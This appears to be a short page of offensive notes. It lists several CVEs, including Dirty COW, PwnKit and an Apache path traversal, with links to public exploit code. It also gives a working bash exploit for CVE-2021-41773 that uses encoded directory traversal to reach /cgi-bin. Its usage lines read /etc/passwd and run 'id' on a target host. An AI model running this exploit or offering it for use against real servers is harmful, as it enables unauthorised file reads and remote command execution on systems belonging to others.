Skip to content

CVE

CVE-2016-5195


  • https://www.exploit-db.com/exploits/40616

CVE-2017-16995


  • https://www.exploit-db.com/exploits/45010

CVE-2019-7214


  • https://www.exploit-db.com/exploits/49216

CVE-2021-4034


  • https://github.com/c3c/CVE-2021-4034
  • https://www.exploit-db.com/exploits/50689

CVE-2021-22204


  • https://www.exploit-db.com/exploits/50911

CVE-2021-41773


#!/bin/bash
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; 
./cve-2021-41773.sh 192.168.220.245 /etc/passwd
./cve-2021-41773.sh 192.168.220.245 /bin/sh id